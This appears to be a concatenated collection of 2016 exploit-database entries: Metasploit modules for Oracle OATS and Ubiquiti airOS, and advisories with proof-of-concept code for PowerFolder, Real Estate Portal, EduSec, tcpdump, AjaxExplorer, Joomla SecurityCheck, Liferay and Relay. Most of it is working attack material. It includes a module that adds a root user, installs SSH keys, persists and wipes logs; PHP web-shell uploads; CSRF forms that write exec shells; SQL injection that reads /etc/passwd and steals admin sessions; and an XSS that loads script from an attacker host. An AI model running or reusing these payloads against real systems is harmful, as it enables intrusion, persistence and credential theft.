if res && res.body.include?('12.4.0.2.0')
CheckCode::Appears
else
CheckCode::Safe
end
end
def exploit
print_status("Uploading JSP shell to #{jsp_path}")
upload_jsp_shell
print_status("Executing JSP shell: #{full_uri}olt/pages/#{jsp_filename}")
exec_jsp_shell
end
def upload_jsp_shell
mime = Rex::MIME::Message.new
mime.add_part('.jsp', nil, nil, 'form-data; name="storage.extension"')
mime.add_part(jsp_filename, nil, nil, 'form-data; name="fileName1"')
mime.add_part('', nil, nil, 'form-data; name="fileName2"') # Not needed
mime.add_part('', nil, nil, 'form-data; name="fileName3"') # Not needed
mime.add_part('', nil, nil, 'form-data; name="fileName4"') # Not needed
mime.add_part('*', nil, nil, 'form-data; name="fileType"')
mime.add_part(payload.encoded, 'text/plain', nil,
%Q{form-data; name="file1"; filename="#{jsp_filename}"})
mime.add_part('Default', nil, nil, 'form-data; name="storage.repository"')
mime.add_part('.', nil, nil, 'form-data; name="storage.workspace"')
mime.add_part(jsp_directory, nil, nil, 'form-data; name="directory"')
register_files_for_cleanup(jsp_path)
send_request_cgi(
'method' => 'POST',
'uri' => '/olt/Login.do/../../olt/UploadFileUpload.do',
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'data' => mime.to_s
)
end
def exec_jsp_shell
send_request_cgi(
'method' => 'GET',
'uri' => "/olt/pages/#{jsp_filename}"
)
end
def jsp_directory
case target['Platform']
when 'win'
'..\\oats\\servers\\AdminServer\\tmp\\_WL_user\\oats_ee\\1ryhnd\\war\\pages'
when 'linux'
'../oats/servers/AdminServer/tmp/_WL_user/oats_ee/1ryhnd/war/pages'
end
end
def jsp_filename
@jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp'
end
def jsp_path
jsp_directory + "#{target['Platform'] == 'win' ? '\\' : '/'}" + jsp_filename
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
# See note about overwritten files
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ubiquiti airOS Arbitrary File Upload',
'Description' => %q{
This module exploits a pre-auth file upload to install a new root user
to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys.
FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten.
/etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true.
This method is used by the "mf" malware infecting these devices.
},
'Author' => [
'93c08539', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
%w{EDB 39701},
%w{URL https://hackerone.com/reports/73480}
],
'DisclosureDate' => 'Feb 13 2016',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'Targets' => [
['Ubiquiti airOS < 5.6.2', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'SSL' => true
}
))
register_options([
Opt::RPORT(443),
OptPort.new('SSH_PORT', [true, 'SSH port', 22])
])
register_advanced_options([
OptBool.new('PERSIST_ETC', [false, 'Persist in /etc/persistent', false]),
OptBool.new('WIPE_LOGS', [false, 'Wipe /var/log/messages', false]),
OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]),
OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])
])
end
def exploit
print_status('Uploading /etc/passwd')
upload_etc_passwd
print_status('Uploading /etc/dropbear/authorized_keys')
upload_authorized_keys
print_status("Logging in as #{username}")
vprint_status("Password: #{password}")
vprint_status("Private key:\n#{private_key}")
if (ssh = ssh_login)
print_good("Logged in as #{username}")
handler(ssh.lsock)
end
end
def on_new_session(session)
super
if datastore['PERSIST_ETC']
print_status('Persisting in /etc/persistent')
persist_etc(session)
end
if datastore['WIPE_LOGS']
print_status('Wiping /var/log/messages')
wipe_logs(session)
end
end
def upload_etc_passwd
mime = Rex::MIME::Message.new
mime.add_part(etc_passwd, 'text/plain', 'binary',
'form-data; name="passwd"; filename="../../etc/passwd"')
send_request_cgi(
'method' => 'POST',
'uri' => '/login.cgi',
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'data' => mime.to_s
)
end
def upload_authorized_keys
mime = Rex::MIME::Message.new
mime.add_part(authorized_keys, 'text/plain', 'binary',
'form-data; name="authorized_keys"; ' \
'filename="../../etc/dropbear/authorized_keys"')
send_request_cgi(
'method' => 'POST',
'uri' => '/login.cgi',
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'data' => mime.to_s
)
end
def ssh_login
ssh_opts = {
port: datastore['SSH_PORT'],
auth_methods: %w{publickey password},
key_data: [private_key],
# Framework options
msframework: framework,
msfmodule: self,
proxies: datastore['Proxies']
}
ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
begin
ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
Net::SSH.start(rhost, username, ssh_opts)
end
rescue Net::SSH::Exception => e
vprint_error("#{e.class}: #{e.message}")
return nil
end
if ssh
report_vuln(
host: rhost,
name: self.name,
refs: self.references,
info: ssh.transport.server_version.version
)
report_note(
host: rhost,
port: datastore['SSH_PORT'],
type: 'airos.ssh.key',
data: private_key
)
return Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
end
nil
end
#
# Persistence and cleanup methods
#
def persist_etc(session)
mime = Rex::MIME::Message.new
mime.add_part(rc_poststart, 'text/plain', 'binary',
'form-data; name="rc.poststart"; ' \
'filename="../../etc/persistent/rc.poststart"')
send_request_cgi(
'method' => 'POST',
'uri' => '/login.cgi',
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'data' => mime.to_s
)
# http://www.hwmn.org/w/Ubiquity_HOWTO
commands = [
"mkdir #{username}",
"cp /etc/passwd /etc/dropbear/authorized_keys #{username}",
'cfgmtd -wp /etc'
]
commands.each do |command|
session.shell_command_token(command)
end
end
def wipe_logs(session)
session.shell_command_token('> /var/log/messages')
end
#
# /etc/passwd methods
#
def etc_passwd
"#{username}:#{hash(password)}:0:0:Administrator:/etc/persistent:/bin/sh\n"
end
def hash(password)
# http://man7.org/linux/man-pages/man3/crypt.3.html
salt = Rex::Text.rand_text(2, '', Rex::Text::AlphaNumeric + './')
password.crypt(salt)
end
def username
@username ||= Rex::Text.rand_text_alpha_lower(8)
end
def password
@password ||= Rex::Text.rand_text_alphanumeric(8)
end
#
# /etc/dropbear/authorized_keys methods
#
def authorized_keys
pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
"#{ssh_keygen.ssh_type} #{pubkey}\n"
end
def private_key
ssh_keygen.to_pem
end
def ssh_keygen
@ssh_keygen ||= OpenSSL::PKey::RSA.new(2048)
end
#
# /etc/persistent/rc.poststart methods
#
def rc_poststart
<<EOF
cp /etc/persistent/#{username}/passwd /etc/passwd
cp /etc/persistent/#{username}/authorized_keys /etc/dropbear/authorized_keys
EOF
end
end
Mogwai Security Advisory MSA-2016-01
----------------------------------------------------------------------
Title: PowerFolder Remote Code Execution Vulnerability
Product: PowerFolder Server
Affected versions: 10.4.321 (Linux/Windows) (Other version might be also affected)
Impact: high
Remote: yes
Product link: https://www.powerfolder.com
Reported: 02/03/2016
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
Vendor's Description of the Software:
----------------------------------------------------------------------
PowerFolder is the leading on-premise solution for file synchronization
and collaboration in your organization. PowerFolder Business Suite and
PowerFolder Enterprise Suite both offer a fully integrated and secure
solution for backup, synchronization and collaboration.
Support for federated RADIUS, LDAP and RESTful APIs allow PowerFolder
to blend in perfectly into your environment while all data is stored
on your own IT infrastructure, ensuring that your data remains 100%
under your control.
Business recommendation:
-----------------------------------------------------------------------
Apply patches that are provided by the vendor. Restrict access to the
PowerFolder port, as the vulnerability might be exploited with other gadgets.
CVSS2 Ratings
-----------------------------------------------------------------------
CVSS Base Score: 9.3
Impact Subscore: 10
Exploitability Subscore: 8.6
CVSS v2 Vector (AV:N/AC:M/Au:N/C:C/I:C/A:C)
-----------------------------------------------------------------------
Vulnerability description:
----------------------------------------------------------------------
The PowerFolder server and client are written in Java. Data exchange is mainly
done via serialized objects that are send over a dedicated port (TCP port 1337).
This service allows deserialization of untrusted data, which can be exploited to
execute arbitrary code.[1][2]
The tested PowerFolder version contains a modified version of the Java
library "ApacheCommons". In this version, the PowerFolder developers removed
certain dangerous classes like
org.apache.commons.collections.functors.InvokerTransformer
however, exploitation is still possible using another gadget chain [3].
Proof of concept:
----------------------------------------------------------------------
A simple PoC can be found here:
https://github.com/h0ng10/powerfolder-exploit-poc
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39854.zip
Disclosure timeline:
----------------------------------------------------------------------
10/02/2016: Bug discovered during pentest preparation
02/03/2016: Initial contact via vendor support form
02/03/2016: Response from vendor, asking for additional details
02/03/2016: Sending description, including a very simple PoC
07/03/2016: Response from PowerFolder developers, they are unable to reproduce
the issue
07/03/2016: Response from Mogwai Security, will develop a improved PoC exploit
12/03/2016: Providing an improved exploit PoC that does not only work in LAN
networks
21/03/2016: Requesting an update from the developers
21/03/2016: Phone call with PowerFolder developers
21/03/2016: Additional response from PowerFolder, they plan to release a
security update at the end of the month
01/04/2016: Release of PowerFolder 10 SP5, including vulnerability
acknowledgement [4]
References:
----------------------------------------------------------------------
[1] https://frohoff.github.io/appseccali-marshalling-pickles/
[2] https://www.youtube.com/watch?v=VviY3O-euVQ
[3] https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections3.java
[4] https://wiki.powerfolder.com/display/PFC/PowerFolder+Client+10+SP5
Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab
----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Gutenbergstrasse 2
89231 Neu-Ulm (Germany)
info@mogwaisecurity.de
Real Estate Portal v4.1 Remote Code Execution Vulnerability
Vendor: NetArt Media
Product web page: http://www.netartmedia.net
Affected version: 4.1
Summary: Real Estate Portal is a software written in PHP,
allowing you to launch powerful and professional looking
real estate portals with rich functionalities for the private
sellers, buyers and real estate agents to list properties
for sale or rent, search in the database, show featured
ads and many others. The private sellers can manage their
ads at any time through their personal administration space.
Desc: Real Estate Portal suffers from an arbitrary file upload
vulnerability leading to an arbitrary PHP code execution. The
vulnerability is caused due to the improper verification of
uploaded files in '/upload.php' script thru the 'myfile' POST
parameter. This can be exploited to execute arbitrary PHP code
by uploading a malicious PHP script file with '.php' extension
that will be stored in the '/uploads' directory.
Tested on: nginx/1.10.0
PHP/5.2.17
MySQL/5.1.66
Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"
@zeroscience
Advisory ID: ZSL-2016-5325
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5325.php
06.05.2016
---
1. Arbitrary File Upload:
-------------------------
Parameter: myfile (POST)
POC URL: http://localhost/uploads/Test.php?cmd=cat%20$%28echo%20L2V0Yy9wYXNzd2Q=%20|%20base64%20-d%29
POST /upload.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://localhost/USERS/index.php
Content-Length: 419
Content-Type: multipart/form-data; boundary=---------------------------8914507815764
Cookie: PHPSESSID=7k4au5p4m0skscj4gjbfedfjs5; AuthU=demo%7Efe01ce2a7fbac8fafaed7c982a04e229%7E1462616214
Connection: close
-----------------------------8914507815764
Content-Disposition: form-data; name="myfile"; filename="Test.php"
Content-Type: image/jpeg
<?php
system($_GET['cmd']);
?>
-----------------------------8914507815764
Content-Disposition: form-data; name=""
undefined
-----------------------------8914507815764
Content-Disposition: form-data; name=""
undefined
-----------------------------8914507815764--
2. Persistent Cross Site Scripting:
-----------------------------------
http://localhost/USERS/index.php
Parameters: title, html, headline, size, youtube_id, address, latitude, longitude, user_first_name, user_last_name, agency, user_phone, user_email, website (POST)
Payload: " onmousemove=alert(1)
EduSec 4.2.5 Multiple SQL Injection Vulnerabilities
Vendor: Rudra Softech
Product web page: http://www.rudrasoftech.com
Affected version: 4.2.5
Summary: EduSec has a suite of selective modules specifically
tailored to the requirements of education industry. EduSec is
engineered and designed considering wide range of management
functions within the university. With the use of EduSec, staff
can be more accountable as it helps to know the performance of
each department in just few seconds. Almost all departments within
education industry (e. g. admission, administration, time table,
examination, HR, finance etc) can be synchronized and accessed.
EduSec helps to assign the responsibilities to employee staff
and can reduce time wastage and can speed up the administrative
functions. Core functions like admissions, library management,
transport management, students’ attendance in short entire range
of university functions can be well performed by EduSec.
Desc: EduSec suffers from multiple SQL Injection vulnerabilities.
Input passed via multiple 'id' GET parameters are not properly
sanitised before being returned to the user or used in SQL queries.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
Tested on: MySQL/5.5.35-0ubuntu0.12.04.2
Apache/2.4.12 (Ubuntu)
Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"
@zeroscience
Advisory ID: ZSL-2016-5326
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5326.php
10.05.2016
--
Parameter: id (GET)
POC URL:
http://localhost/student/stu-master/view?id=2%20UniOn%20SeleCt%201,load_file%28%27/etc/passwd%27%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--#guardians
http://localhost/employee/emp-master/view?id=20%27
Request:
GET /student/stu-master/view?id=2%20UniOn%20SeleCt%201,load_file(%27/etc/passwd%27),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=r18cpflgekesdn8cam8c8jmf86; _csrf=0f8795c6671d0db724d513142cc81e5d3ca8b83c094b970242fda96899be8148a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22E-TdUjNTZVVugL36t2p-VcoC6MBR4hqq%22%3B%7D; language=32d49278f28c78229de164fe79dc13b6adb3c98af2d133240eb1ffc44771ad3da%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A2%3A%22en%22%3B%7D; isRTL=0fc3d58c320669b52dea022e5a3db09649641bfdd1cbba93929ce2932c57707aa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22isRTL%22%3Bi%3A1%3Bi%3A0%3B%7D
Connection: close
Response:
HTTP/1.1 200 OK
Date: Fri, 13 May 2016 08:35:05 GMT
Server: Apache/2.4.12 (Ubuntu)
<....snip>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
.
..
...
....
.....
......
# Exploit Title: tcpdump 4.5.1 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro
# Vendor Homepage: http://www.tcpdump.org
# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
# Version: 4.5.1
# Tested on: Ubuntu 14 LTS
from subprocess import call
from shlex import split
from time import sleep
def crash():
command = 'tcpdump -r crash'
buffer = '\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff'
buffer += '\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00'
buffer += '\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00<\x9c7@\xff\x00'
buffer += '\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a'
buffer += "\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&\x80\x18\'"
buffer += "xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n', '\x00\x00\x00\x00"
buffer += '\x00\x00\x00\x00\x01\x03\x03\x04'
with open('crash', 'w+b') as file:
file.write(buffer)
try:
call(split(command))
print("Exploit successful! ")
except:
print("Error: Something has gone wrong!")
def main():
print("Author: David Silveiro ")
print(" tcpdump version 4.5.1 Access Violation Crash ")
sleep(2)
crash()
if __name__ == "__main__":
main()
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AJAXEXPLORER-REMOTE-CMD-EXECUTION.txt
[+] ISR: apparitionsec
Vendor:
==========
sourceforge.net
smsid
download linx:
sourceforge.net/projects/ajax-explorer/files/
Product:
=======================
AjaxExplorer v1.10.3.2
Manage server files through simple windows like interface.
Vulnerability Type:
=======================
Remote Command Execution
CSRF
Persistent XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
AjaxExplorer has command terminal feature where you can move, copy, delete
files etc... also lets a user save commands in a
flat file named "terminal" under their user profile
"/ae.user/owner/myprofile".
e.g.
copy [FILEPATH + FILENAME] [FILEPATH]
create [FILEPATH + FILENAME]
Since AjaxExplorer also suffers from CSRF vulnerability we can exploit the
application by first creating an .htaccess file with an
"allow from all" directive to bypass access restrictions, next create
arbitrary PHP files for remote command execution purposes.
This exploit will require two consecutive HTTP requests, so we need to
target an iframe to stay on same page until exploit is completed.
Exploit code(s):
===============
1) first POST request creates .htaccess file so we can bypass directory
browsing restrictions.
2) second POST writes our remote command execution file we will then access
to execute commands on the victim system.
The below P:/ for "strPath" form value is for "Profile"
<iframe name="PWNED" style="display:none" name="hidden-form"></iframe>
<form target="PWNED" id="htaccess" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php"
method="post">
<input type="hidden" name="strPage" value="control/file/editor" >
<input type="hidden" name="strPath" value="P:/" >
<input type="hidden" name="strFile" value=".htaccess" >
<input type="hidden" name="strText" value='allow from all' >
<script>document.getElementById('htaccess').submit()</script>
</form>
<form target="PWNED" id="RCE" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php"
method="post">
<input type="hidden" name="strPage" value="control/file/editor" >
<input type="hidden" name="strPath" value="P:/" >
<input type="hidden" name="strFile" value="terminal.php" >
<input type="hidden" name="strText" value='<?php exec($_GET["cmd"]);?>' >
<script>document.getElementById('RCE').submit()</script>
</form>
Now we can access and run arbitrary cmds.
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/ae.user/owner/myprofile/terminal.php?cmd=c
:\\Windows\\system32\\calc.exe
/////////////////////////////////////////////////////
Here is another way to RCE this application... first create PHP file then
edit.
<iframe name="DOOM" style="display:none" name="hidden-form"></iframe>
<form target="DOOM" id="CSRF2" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/editor" />
<input type="hidden" name="strPath" value="D:/" />
<input type="hidden" name="strFile" value="PWNED.php" />
<input type="hidden" name="strText"
value="<?php%20exec($_GET['cmd']);%20?>" />
</form>
<form target="DOOM" id="CSRF1" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/create" />
<input type="hidden" name="strPath" value="D:/" />
<input type="hidden" name="strFile" value="D:/PWNED.php" />
<script>
document.getElementById('CSRF1').submit()
document.getElementById('CSRF2').submit()
</script>
</form>
////////////////////////
Persistent XSS:
================
We can also write persistent XSS payload to the user profile "terminal"
file.
<form id="XSS" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/editor" />
<input type="hidden" name="strPath" value="P:/" />
<input type="hidden" name="strFile" value="terminal" />
<input type="hidden" name="strText" value="<script>alert(666)</script>" />
<script>document.getElementById('XSS').submit()</script>
</form>
Disclosure Timeline:
===============================
Vendor Notification: NA
June 1, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
8.0 (High)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=803
The following SIGSEGV crash due to an invalid memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==28415==ERROR: AddressSanitizer: SEGV on unknown address 0x61b000022d84 (pc 0x7f0e1b0002a2 bp 0x7ffde25a76f0 sp 0x7ffde25a7630 T0)
#0 0x7f0e1b0002a1 in erf_meta_read_tag wireshark/wiretap/erf.c:1242:13
#1 0x7f0e1afff0f0 in populate_summary_info wireshark/wiretap/erf.c:1851:27
#2 0x7f0e1aff34d6 in erf_read wireshark/wiretap/erf.c:447:7
#3 0x7f0e1b1a746b in wtap_read wireshark/wiretap/wtap.c:1245:7
#4 0x528196 in load_cap_file wireshark/tshark.c:3478:12
#5 0x51e67c in main wireshark/tshark.c:2192:13
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV wireshark/wiretap/erf.c:1242:13 in erf_meta_read_tag
==28415==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12352. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39877.zip
Information
------------------------------
Advisory by ADEO Security Team
Name: Stored XSS and SQL Injection in Joomla SecurityCheck extension
Affected Software : SecurityCheck and SecurityCheck Pro
Vulnerable Versions: 2.8.9 (possibly below)
Vendor Homepage : https://securitycheck.protegetuordenador.com
Vulnerabilities Type : XSS and SQL Injection
Severity : High
Status : Fixed
Technical Details
------------------------------
PoC URLs for SQL Injection
For determining database, user and version.
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(user())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(version())))))='1
For steal admin's session ID (If admin is not online, page response with
attack detected string. If online, response with admin's session ID)
http://website/index.php?option='or(ExtractValue(rand(),concat(0x3a,(SELECT
concat(session_id) FROM %23__user_usergroup_map INNER JOIN %23__users ON
%23__user_usergroup_map.user_id=%23__users.id INNER JOIN %23__session ON %
23__users.id=%23__session.userid WHERE group_id=8 LIMIT 0,1))))='1
PoC URLs for XSS
Add a new admin to website silently while admin checking SecurityCheck logs
http://website/index.php?option=<script>var script =
document.createElement('script');script.src = "http://ATTACKER/attack.js
";document.getElementsByTagName('head')[0].appendChild(script);</script>
attack.js
https://gist.github.com/MuhammetDilmac/c680cc921143543561bfdfd7b25da1ca
Disclosure Timeline
------------------------------
24/05/2016 SQL injection found
30/05/2016 Worked on one-shot exploit for SQLi
30/05/2016 While we were working on SQLi payload we also found XSS
31/05/2016 XSS payload prepared
31/05/2016 Vulnerability details and PoC sent to Protegetuordenador
31/05/2016 Vulnerabilities fixed in v2.8.10
Solution
------------------------------
Update to the latest version of SecurityCheck (2.8.10)
Credits
------------------------------
These issues have been discovered by Gokmen Guresci (gokmenguresci.com) and
Muhammet Dilmac (muhammetdilmac.com.tr).
CVE-2016-3670 Stored Cross Site Scripting in Liferay CE
1. Vulnerability Properties
Title: Stored Cross-Site Scripting Liferay CE
CVE ID: CVE-2016-3670
CVSSv3 Base Score: 4.6 (AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)
Vendor: Liferay Inc
Products: Liferay
Advisory Release Date: 27 May 2016
Advisory URL: https://labs.integrity.pt/advisories/cve-2016-3670
Credits: Discovery by Fernando Câmara <fbc[at]integrity.pt>
2. Vulnerability Summary
Liferay is vulnerable to a stored XSS when an user is created with an
malicious payload on the FirstName field.
The javascript payload is executed when another user tries to use the
profile search section.
3. Technical Details
An XSS vulnerability was found on the Profile Search functionality,
accessible through User -> My Profile -> Search. An attacker can set a
malicious javascript payload on his First Name affecting anyone who
performs a search using a keyword present on his profile.
The exploitation of this vulnerability could lead to an effective way to
grab cookies (stealing sessions) from anyone that uses that search
component.
Exploitation Request: (User Registration with an malicious FirstName field)
POST /liferay/web/guest/home?p_p_id=58&p_p_lifecycle=1&p_p_state=
maximized&p_p_mode=view&_58_struts_action=%2Flogin%2Fcreate_account
Data:
_58_firstName=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2
The vulnerability is located on the users.jsp and as shown below the origin
is the lack of validation of user input:
line 64: <a data-value=”<%= curUserName %>” href=”javascript:;”>
4. Vulnerable Versions
< 6.2 CE GA6
5. Solution
Update to version 7.0.0 CE RC1
6. Vulnerability Timeline
21/Jan/16 - Bug reported to Liferay
22/Mar/16 – Bug verified by vendor
22/Mar/16 – Bug fixed by vendor
27/May/16 – Advisory released
7. References
https://issues.liferay.com/browse/LPS-62387
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3670
Advisory: Unauthenticated File Upload in Relay Ajax Directory Manager
may Lead to Remote Command Execution
A vulnerability within the Relay Ajax Directory Manager web application
allows unauthenticated attackers to upload arbitrary files to the web
server running the web application.
Details
=======
Product: Relay Ajax Directory Manager
Affected Versions: relayb01-071706, 1.5.1, 1.5.3 were tested, other
versions most likely vulnerable as well.
Fixed Versions: -
Vulnerability Type: Unauthenticated File Upload
Security Risk: high
Vendor URL: https://github.com/HadoDokis/Relay-Ajax-Directory-Manager
Vendor Status: decided not to fix, project is unmaintained
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-005
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
============
Relay Ajax Directory Manager[1], also known as relay[2], is a web-based
file manager. It allows files and folders to be uploaded via drag and
drop and provides several other features, such as a thumbnail preview
for images and basic user authentication functionality.
More Details
============
While the web application itself is mostly written in PHP, it also
utilizes the Perl script 'upload.pl' for handling uploads initiated by
the user.
Uploading is a multi-step process:
1. The user initiates a multipart/form-data upload request through the
web application. This request is sent to the Perl script and the
following steps are handled by it.
2. A temporary file containing the entire request (including
headers) is created. This temporary file is named partly by the first
URL parameter, as shown in the following listing.
3. The headers and the POST body of the request are parsed and filtered
to determine the final filename.
4. The upload is written to the final destination.
5. A file containing statistics about the upload process is written
During steps 2-5, no checks are performed to ensure that the user is
sufficiently authenticated.
The following listing shows parts of the upload Perl script:
-- upload.pl -----------------------------------------------------------
[...]
@qstring=split(/&/,$ENV{'QUERY_STRING'});
$sessionid = $qstring[0];
[...]
$tmpfile = "$uploadsFolder\\temp_$sessionid";
$statsfile = "$uploadsFolder\\stats_$sessionid.txt";
$tmpfilepre= "$uploadsFolder\\$sessionid\_";
[...]
open(FILE,">","$tmpfilepre$filename") or print "can't open temp file";
binmode(FILE);
print FILE $filedata;
close FILE;
[...]
------------------------------------------------------------------------
Here, the first URL parameter is stored in the variable $sessionid. The
content of this variable is then used as a prefix for the filename for
the uploaded data before it ultimately gets written. Given the
configured upload directory, which is 'uploads/' by default, the URL of
the uploaded file can be determined.
The web application usually requires users to be authenticated before
any actions (e.g. uploading) can be performed, but since the Perl script
is not secured by any form of authentication, it can be accessed by
anyone. If the web server does not prohibit the execution of e.g. PHP
files within the upload directory, arbitrary PHP commands can be
executed by uploading the respective files to the web server.
Proof of Concept
================
In general, the Perl script expects a request containing
multipart/form-data. In this case, the name specified in the 'filename'
field is prepended with the first URL parameter. Using the command line
HTTP client curl, a request like the following can be made to a
vulnerable installation of Relay Ajax Directory Manager in order to
upload a PHP script which invokes the function 'phpinfo()':
curl -i -s -k -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=----------------------------83ff53821b7c' \
--data-binary $'------------------------------83ff53821b7c\x0d\x0a'\
$'Content-Disposition: form-data; filename=\"info.php\"\x0d\x0a'\
$'Content-Type: application/octet-stream\x0d\x0a\x0d\x0a'\
$'<?php phpinfo(); ?>\x0d\x0a'\
$'------------------------------83ff53821b7c--' \
'http://example.com/relay-1-5-3/upload.pl?redteam'
The server responds with HTTP status code 200 indicating a successful
upload:
HTTP/1.1 200 OK
Date: Mon, 09 May 2016 11:09:50 GMT
Server: Apache/2.4.18 (Debian)
Content-Length: 0
Content-Type: text/plain
Such a request would yield the following files in the web server's
upload directory upon success:
$ ls relay-1-5-3/uploads/
redteam_info.php stats_redteam.txt temp_redteam
The file redteam_info.php contains the multipart/form-data that was
sent to the upload.pl script:
$ cat relay-1-5-3/uploads/temp_redteam.php
<?php phpinfo(); ?>
Requesting this file with the URL
http://example.com/relay-1-5-3/uploads/redteam_info.php will then yield
the server's output of the phpinfo() function.
However, since the entire content of the upload request is saved to a
temporary file, a regular POST request containing only the code to be
executed is sufficient to exploit this vulnerability. The following
invocation of curl uploads the same PHP script which invokes the
function 'phpinfo()':
$ curl --silent --include --data '<?php phpinfo(); ?>' \
'http://example.com/relay-1-5-3/upload.pl?redteam.php'
In the server's upload directory, the file temp_redteam.php contains
the data that was sent to the upload.pl script:
$ ls relay-1-5-3/uploads/
stats_redteam.php.txt temp_redteam.php
$ cat temp_redteam.php
<?php phpinfo(); ?>
Requesting this file with the URL
